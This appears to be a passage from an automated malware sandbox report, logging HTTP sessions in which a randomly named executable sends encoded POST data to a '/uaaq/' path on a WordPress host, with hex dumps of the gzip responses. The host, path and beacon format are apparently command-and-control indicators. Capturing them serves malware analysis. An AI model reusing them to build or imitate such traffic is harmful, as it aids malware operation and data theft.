                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4b 33 64 44 45 72 6d 77 67 57 51 67 42 4a 49 78 6e 58 73 59 66 42 4f 55 73 74 56 76 5a 66 53 74 56 36 4e 53 48 57 52 70 47 74 6a 73 53 70 70 5a 38 6d 48 4c 51 67 7a 65 58 77 55 37 64 36 35 58 43 4e 78 69 4f 68 59 6c 33 56 65 75 67 67 4a 61 78 49 44 65 35 50 30 64 4c 4c 72 57 30 30 59 71 74 6e 52 6c 79 47 6f 71 47 56 51 52 59 48 65 33 75 46 53 78 56 34 43 43 70 68 33 2b 73 72 44 78 6b 35 2b 63 34 4b 47 42 78 5a 47 2b 45 43 5a 4d 54 55 6c 6b 4f 4d 65 64 4b 35 6b 74 67 69 77 48 59 48 6b 2f 7a 58 38 71 4a 7a 74 72 62 71 4d 35 54 51 3d 3d
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgBJIxnXsYfBOUstVvZfStV6NSHWRpGtjsSppZ8mHLQgzeXwU7d65XCNxiOhYl3VeuggJaxIDe5P0dLLrW00YqtnRlyGoqGVQRYHe3uFSxV4CCph3+srDxk5+c4KGBxZG+ECZMTUlkOMedK5ktgiwHYHk/zX8qJztrbqM5TQ==
                                                                                    Dec 4, 2023 12:05:16.914872885 CET1340INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:16 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93
                                                                                    Data Ascii: }vH}NdU)Srw$,@(JyoO~O *"yo_wi2=<_8>TYU<OV3(o(H]4cDo&JdFF(H~=k(SlS. JpdzS{i(&.&=44My?uc%v L{Ne&S%R?'J'ZQ4%t;5A&1!M<PwrD>!M(YdTBD&z+P>CmM0QemCsm?13M"Ng1g:48gE?tL0sX=^QXum5{:=J@f8yn<:+Q&HDlw526ig4w~G^4y$rDIdOEFCMH4cEh:Vo&4$r%9sluFX]-^~llJpsxY}&wwj4ki\_OFU~N57-j5MiCW9huO!vQ;Bl:VCRw2MM
                                                                                    Dec 4, 2023 12:05:16.914988041 CET1340INData Raw: e0 7a dd 41 48 09 70 c4 d0 48 cf 63 54 8e 0d e5 d5 8f 97 1f 2f 0f 9a bc 7b a6 66 be b9 62 c8 75 66 98 1f 3e cc 87 ac a7 8e 1f 6b 60 c0 c7 34 b1 a7 4f f9 b8 f5 b4 92 04 1f 84 f2 b1 8e 78 a0 dc 3e 76 a0 0a c3 17 c5 f1 d7 67 38 94 32 7b bc 6a 38 95
                                                                                    Data Ascii: zAHpHcT/{fbuf>k`4Ox>vg82{j8'<W'>)"tnyR-;'D;@,3`!#$`bPPGEq3h<MViuC7=gcGCz _q<Yd~B\
                                                                                    Dec 4, 2023 12:05:16.915046930 CET1340INData Raw: 35 d6 f7 c1 e6 29 b4 9e 77 38 18 7e 0f 29 fc 90 fa a0 9e 77 ba c3 ca d4 27 4f 0a e5 1b bc 3b 3f 02 25 44 d5 ad 2a 91 77 de 6a 8c 79 7e 09 77 7d ff c6 f8 1e 49 10 c8 28 d4 14 cc 01 5a e3 e5 e1 23 13 de 22 7c 7c 41 3c 6f 44 ec 13 b9 af cb 80 c6 e5
                                                                                    Data Ascii: 5)w8~)w'O;?%D*wjy~w}I(Z#"||A<oDXs?")m5R+vQs.9$Ex!xCMVJ9zcMRqD9|9,)0-8&@Rg/2pY^HyP2O!wDTdi
                                                                                    Dec 4, 2023 12:05:16.915129900 CET1340INData Raw: 2d ba a6 4d 38 74 38 8f 42 0f 41 f7 46 1d 93 96 eb 38 c1 3e 01 76 67 05 37 f4 f2 12 02 54 2d 12 65 25 6a 66 ab e3 d0 49 23 9a 8c 48 ad db 30 db bd 86 65 f5 1a 66 5d 01 23 04 89 35 b3 d3 69 f4 4d 48 6c d7 15 b4 4c f5 b5 a4 cb 12 ce 69 cb 62 5c 4f
                                                                                    Data Ascii: -M8t8BAF8>vg7T-e%jfI#H0ef]#5iMHlLib\OfZ1f7zJ kk<tF.LeWbf)!5]8NbeMAHvlhot@ Fi.H4I4m$k66sf%KDNvG7M =
                                                                                    Dec 4, 2023 12:05:16.915209055 CET1340INData Raw: 3c ab c2 29 6d 13 f3 c9 a9 3b 61 1b a8 14 52 98 7f 07 08 ca 8f 47 8a ad 64 f5 7a 3a 7b e2 fa 00 e7 22 9e 7f d6 04 ec 2a e1 3b 99 5f 96 e4 94 ef 6f 97 24 6f b2 25 32 b6 90 92 9d c2 d1 bb fb bb 9d 71 11 d2 05 ef 66 1c b1 a5 09 67 f7 53 2e e9 d5 1e
                                                                                    Data Ascii: <)m;aRGdz:{"*;_o$o%2qfgS.D&H/Zn]e]WdRX3{;V&.{{7dY8s6MfaL;:GvqeF9-WXkYol0^
                                                                                    Dec 4, 2023 12:05:16.915266037 CET1340INData Raw: ce 2a ce da 60 a5 c6 a8 98 b8 27 56 16 2c 9f 72 d3 26 24 cc 68 0a 24 eb 70 20 7c 11 81 d6 6a 95 a4 b8 02 b5 5e 88 74 d4 ef 10 47 aa 68 21 a1 58 4d 8e 96 33 58 cd 1e b7 a1 ac 6b 57 d0 0a 83 70 8e 53 99 8e a4 21 d5 78 d6 f3 6b 3a ce 5e ab 6f 28 65
                                                                                    Data Ascii: *`'V,r&$h$p |j^tGh!XM3XkWpS!xk:^o(e+a2,UED9%2z7)S!R>j)x2ij88^l#fvM?C/VvO)e.J'\~%tlw/W-868YsU7
                                                                                    Dec 4, 2023 12:05:16.915344000 CET1340INData Raw: aa e2 ef 25 38 2c db 96 7b 18 2a 96 9d a1 7b 18 38 96 4d c4 bd 0d 23 4b 15 b9 b7 41 65 a9 1e d7 0a 31 3f bf a5 70 db 1e 8d 0d cb 96 72 78 e8 24 36 9b 4a 2b b1 02 f2 b3 5d 22 ef b5 fa ed 7e 5f 5e 81 5e b3 30 ce 22 57 0f 7b 61 ba c6 97 e0 b1 69 be
                                                                                    Data Ascii: %8,{*{8M#KAe1?prx$6J+]"~_^^0"W{ai]c LpSwXhH^qX3YhU,JY(8ovwVlZ,:2$"3VfCV*:n56p?^N{Lm\~ZFXP,6f=Ows;7cKgv
                                                                                    Dec 4, 2023 12:05:16.915400982 CET1340INData Raw: 78 47 d9 fd dd 43 f6 e5 60 12 e6 7e 39 98 b4 e9 60 d2 6f 2d 20 fb 72 30 e9 be 05 6b 5f 0e 26 7d 39 98 f4 e5 60 52 45 6d 7e fb 21 df 97 83 49 f7 21 1c fc 72 30 e9 cb c1 a4 2f 07 93 be 1c 4c aa ac c7 5d 1f 4c 2a 26 17 ce 0a dc e9 fd dd 66 ab df 36
                                                                                    Data Ascii: xGC`~9`o- r0k_&}9`REm~!I!r0/L]L*&f6i[5G_J{V].zXExg-gF6hq=`{=x\q.T!Zv1hg[_)<d338TLOFoY2
                                                                                    Dec 4, 2023 12:05:16.915455103 CET1340INData Raw: f7 7a 86 39 32 ec 56 bf d3 1b ef 99 6d cb b4 e8 38 23 8e c0 1b 02 a1 1c 42 23 e3 84 4d e4 2f 42 9d 51 80 4e c1 62 20 fa 92 24 a4 a6 5c 28 4f 71 52 55 71 dc 88 cf ef 1d cf 0d c3 68 7b 49 f4 74 a0 fc ac 3c c5 07 e5 a3 72 a9 d4 ab 1c e6 55 b3 93 f5
                                                                                    Data Ascii: z92Vm8#B#M/BQNb $\(OqRUqh{It<rU =SJEEk{vt:{@" x0s oD/LqjSX& h$T/!8|C@8g~@6MkS`3Upx/ #B}95K_0d3Ny
                                                                                    Dec 4, 2023 12:05:16.915498972 CET265INData Raw: 8d ed 52 48 86 9e 3b ab ef 0b 8c 1d 00 2f 7f c3 51 4b ec 95 4c 87 79 0c 44 e9 18 02 1b 88 19 21 f1 e7 8f 50 f4 84 c7 31 78 77 dc 29 2d 4a f3 67 15 3d 81 10 ba e8 50 58 a6 46 9e 22 ba f4 c7 86 ca d7 a0 87 6c bd 72 98 4e c3 03 1b 4b a0 81 21 19 4f
                                                                                    Data Ascii: RH;/QKLyD!P1xw)-Jg=PXF"lrNK!OZkt53!n}{)-qC(p1h2MqVQuBT$6oD]Ize]l 5G|nLf<4Hm>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.11.304978065.108.122.245803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:18.699153900 CET733OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4b 33 64 44 45 72 6d 77 67 57 51 67 43 6f 34 78 67 77 77 59 58 42 4f 4c 6e 4e 56 76 53 2f 53 70 56 36 52 53 48 53 41 73 42 66 33 73 53 4c 68 5a 7a 46 66 4c 52 67 7a 65 59 51 55 79 44 4b 35 63 43 4e 30 58 4f 6b 77 6c 33 56 61 75 67 6b 46 61 78 37 72 64 6f 50 30 66 47 72 72 51 77 30 59 71 74 6e 52 6c 79 43 49 41 47 56 49 52 59 33 75 33 38 6e 36 77 4c 6f 44 77 2f 78 33 2b 36 72 43 34 6b 35 2f 37 34 4c 71 76 78 66 4b 2b 45 48 39 4d 54 46 6c 6e 41 4d 65 62 46 5a 6b 2b 70 54 52 4d 55 41 55 31 32 6b 67 57 65 32 41 31 65 2f 67 71 55 69 71 37 53 6e 61 44 46 50 72 36 38 36 35 4d 6e 51 36 34 64 31 55 3d
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgCo4xgwwYXBOLnNVvS/SpV6RSHSAsBf3sSLhZzFfLRgzeYQUyDK5cCN0XOkwl3VaugkFax7rdoP0fGrrQw0YqtnRlyCIAGVIRY3u38n6wLoDw/x3+6rC4k5/74LqvxfK+EH9MTFlnAMebFZk+pTRMUAU12kgWe2A1e/gqUiq7SnaDFPr6865MnQ64d1U=
                                                                                    Dec 4, 2023 12:05:19.607378006 CET1340INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:18 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93
                                                                                    Data Ascii: }vH}NdU)Srw$,@(JyoO~O *"yo_wi2=<_8>TYU<OV3(o(H]4cDo&JdFF(H~=k(SlS. JpdzS{i(&.&=44My?uc%v L{Ne&S%R?'J'ZQ4%t;5A&1!M<PwrD>!M(YdTBD&z+P>CmM0QemCsm?13M"Ng1g:48gE?tL0sX=^QXum5{:=J@f8yn<:+Q&HDlw526ig4w~G^4y$rDIdOEFCMH4cEh:Vo&4$r%9sluFX]-^~llJpsxY}&wwj4ki\_OFU~N57-j5MiCW9huO!vQ;Bl:VCRw2MM
                                                                                    Dec 4, 2023 12:05:19.607470989 CET1340INData Raw: e0 7a dd 41 48 09 70 c4 d0 48 cf 63 54 8e 0d e5 d5 8f 97 1f 2f 0f 9a bc 7b a6 66 be b9 62 c8 75 66 98 1f 3e cc 87 ac a7 8e 1f 6b 60 c0 c7 34 b1 a7 4f f9 b8 f5 b4 92 04 1f 84 f2 b1 8e 78 a0 dc 3e 76 a0 0a c3 17 c5 f1 d7 67 38 94 32 7b bc 6a 38 95
                                                                                    Data Ascii: zAHpHcT/{fbuf>k`4Ox>vg82{j8'<W'>)"tnyR-;'D;@,3`!#$`bPPGEq3h<MViuC7=gcGCz _q<Yd~B\
                                                                                    Dec 4, 2023 12:05:19.607584000 CET1340INData Raw: 35 d6 f7 c1 e6 29 b4 9e 77 38 18 7e 0f 29 fc 90 fa a0 9e 77 ba c3 ca d4 27 4f 0a e5 1b bc 3b 3f 02 25 44 d5 ad 2a 91 77 de 6a 8c 79 7e 09 77 7d ff c6 f8 1e 49 10 c8 28 d4 14 cc 01 5a e3 e5 e1 23 13 de 22 7c 7c 41 3c 6f 44 ec 13 b9 af cb 80 c6 e5
                                                                                    Data Ascii: 5)w8~)w'O;?%D*wjy~w}I(Z#"||A<oDXs?")m5R+vQs.9$Ex!xCMVJ9zcMRqD9|9,)0-8&@Rg/2pY^HyP2O!wDTdi
                                                                                    Dec 4, 2023 12:05:19.607661009 CET1340INData Raw: 2d ba a6 4d 38 74 38 8f 42 0f 41 f7 46 1d 93 96 eb 38 c1 3e 01 76 67 05 37 f4 f2 12 02 54 2d 12 65 25 6a 66 ab e3 d0 49 23 9a 8c 48 ad db 30 db bd 86 65 f5 1a 66 5d 01 23 04 89 35 b3 d3 69 f4 4d 48 6c d7 15 b4 4c f5 b5 a4 cb 12 ce 69 cb 62 5c 4f
                                                                                    Data Ascii: -M8t8BAF8>vg7T-e%jfI#H0ef]#5iMHlLib\OfZ1f7zJ kk<tF.LeWbf)!5]8NbeMAHvlhot@ Fi.H4I4m$k66sf%KDNvG7M =
                                                                                    Dec 4, 2023 12:05:19.607717037 CET1340INData Raw: 3c ab c2 29 6d 13 f3 c9 a9 3b 61 1b a8 14 52 98 7f 07 08 ca 8f 47 8a ad 64 f5 7a 3a 7b e2 fa 00 e7 22 9e 7f d6 04 ec 2a e1 3b 99 5f 96 e4 94 ef 6f 97 24 6f b2 25 32 b6 90 92 9d c2 d1 bb fb bb 9d 71 11 d2 05 ef 66 1c b1 a5 09 67 f7 53 2e e9 d5 1e
                                                                                    Data Ascii: <)m;aRGdz:{"*;_o$o%2qfgS.D&H/Zn]e]WdRX3{;V&.{{7dY8s6MfaL;:GvqeF9-WXkYol0^
                                                                                    Dec 4, 2023 12:05:19.607806921 CET1340INData Raw: ce 2a ce da 60 a5 c6 a8 98 b8 27 56 16 2c 9f 72 d3 26 24 cc 68 0a 24 eb 70 20 7c 11 81 d6 6a 95 a4 b8 02 b5 5e 88 74 d4 ef 10 47 aa 68 21 a1 58 4d 8e 96 33 58 cd 1e b7 a1 ac 6b 57 d0 0a 83 70 8e 53 99 8e a4 21 d5 78 d6 f3 6b 3a ce 5e ab 6f 28 65
                                                                                    Data Ascii: *`'V,r&$h$p |j^tGh!XM3XkWpS!xk:^o(e+a2,UED9%2z7)S!R>j)x2ij88^l#fvM?C/VvO)e.J'\~%tlw/W-868YsU7
                                                                                    Dec 4, 2023 12:05:19.607861996 CET1340INData Raw: aa e2 ef 25 38 2c db 96 7b 18 2a 96 9d a1 7b 18 38 96 4d c4 bd 0d 23 4b 15 b9 b7 41 65 a9 1e d7 0a 31 3f bf a5 70 db 1e 8d 0d cb 96 72 78 e8 24 36 9b 4a 2b b1 02 f2 b3 5d 22 ef b5 fa ed 7e 5f 5e 81 5e b3 30 ce 22 57 0f 7b 61 ba c6 97 e0 b1 69 be
                                                                                    Data Ascii: %8,{*{8M#KAe1?prx$6J+]"~_^^0"W{ai]c LpSwXhH^qX3YhU,JY(8ovwVlZ,:2$"3VfCV*:n56p?^N{Lm\~ZFXP,6f=Ows;7cKgv
                                                                                    Dec 4, 2023 12:05:19.607916117 CET1340INData Raw: 78 47 d9 fd dd 43 f6 e5 60 12 e6 7e 39 98 b4 e9 60 d2 6f 2d 20 fb 72 30 e9 be 05 6b 5f 0e 26 7d 39 98 f4 e5 60 52 45 6d 7e fb 21 df 97 83 49 f7 21 1c fc 72 30 e9 cb c1 a4 2f 07 93 be 1c 4c aa ac c7 5d 1f 4c 2a 26 17 ce 0a dc e9 fd dd 66 ab df 36
                                                                                    Data Ascii: xGC`~9`o- r0k_&}9`REm~!I!r0/L]L*&f6i[5G_J{V].zXExg-gF6hq=`{=x\q.T!Zv1hg[_)<d338TLOFoY2
                                                                                    Dec 4, 2023 12:05:19.607969046 CET1340INData Raw: f7 7a 86 39 32 ec 56 bf d3 1b ef 99 6d cb b4 e8 38 23 8e c0 1b 02 a1 1c 42 23 e3 84 4d e4 2f 42 9d 51 80 4e c1 62 20 fa 92 24 a4 a6 5c 28 4f 71 52 55 71 dc 88 cf ef 1d cf 0d c3 68 7b 49 f4 74 a0 fc ac 3c c5 07 e5 a3 72 a9 d4 ab 1c e6 55 b3 93 f5
                                                                                    Data Ascii: z92Vm8#B#M/BQNb $\(OqRUqh{It<rU =SJEEk{vt:{@" x0s oD/LqjSX& h$T/!8|C@8g~@6MkS`3Upx/ #B}95K_0d3Ny
                                                                                    Dec 4, 2023 12:05:19.608011961 CET265INData Raw: 8d ed 52 48 86 9e 3b ab ef 0b 8c 1d 00 2f 7f c3 51 4b ec 95 4c 87 79 0c 44 e9 18 02 1b 88 19 21 f1 e7 8f 50 f4 84 c7 31 78 77 dc 29 2d 4a f3 67 15 3d 81 10 ba e8 50 58 a6 46 9e 22 ba f4 c7 86 ca d7 a0 87 6c bd 72 98 4e c3 03 1b 4b a0 81 21 19 4f
                                                                                    Data Ascii: RH;/QKLyD!P1xw)-Jg=PXF"lrNK!OZkt53!n}{)-qC(p1h2MqVQuBT$6oD]Ize]l 5G|nLf<4Hm>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.11.304978165.108.122.245803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:21.415843964 CET1650OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4b 33 64 44 45 72 6d 77 67 57 51 67 43 6f 34 78 67 77 77 59 58 42 4f 4c 6e 4e 56 76 53 2f 53 70 56 36 52 53 48 53 41 73 42 66 76 73 53 59 35 5a 38 46 6a 4c 57 67 7a 65 56 77 55 2f 44 4b 35 4e 43 4c 63 54 4f 6b 38 54 33 58 79 75 67 48 4e 61 33 4b 72 64 78 66 30 66 5a 37 72 56 30 30 59 37 74 6e 42 70 79 47 6b 41 47 56 49 52 59 78 4b 33 35 46 53 77 4a 6f 43 43 70 68 33 79 73 72 43 51 6b 35 33 42 34 4c 65 52 78 76 71 2b 48 6e 4e 4d 52 33 4e 6e 4d 4d 65 5a 4a 35 6c 6a 70 54 64 44 55 41 67 35 32 6b 6b 34 65 78 45 31 55 36 64 48 52 41 43 47 46 45 75 39 41 73 2f 51 6b 74 39 4a 32 6a 54 2f 66 69 47 47 71 67 71 37 4b 39 30 68 2b 53 6e 48 4c 4a 58 4b 71 6f 49 64 6b 31 30 52 6f 52 55 4c 58 56 2f 31 4b 78 68 34 32 66 73 2f 6b 47 70 6e 39 6b 48 46 2b 70 74 78 66 47 65 34 2f 45 37 63 74 37 64 53 73 2b 6e 61 4c 55 45 6b 50 4d 7a 76 73 6d 75 52 61 37 48 30 2b 6d 31 67 62 69 72 77 4a 30 65 6c 36 6e 44 35 34 73 63 48 6a 32 42 4e 32 65 38 75 53 42 66 57 66 2f 7a 35 30 62 68 6b 74 32 6e 35 64 6f 53 79 59 77 36 77 47 4b 56 2f 68 63 61 32 4e 2f 52 54 73 33 54 4f 4d 77 69 48 72 65 54 6c 39 64 70 76 2f 2b 53 41 31 79 6e 41 59 42 78 30 41 57 79 6e 74 69 5a 44 77 68 54 44 55 4a 42 4f 2b 31 4a 79 38 6f 6f 69 59 63 62 44 77 4f 79 61 76 56 44 4c 56 47 74 4d 55 6a 52 64 63 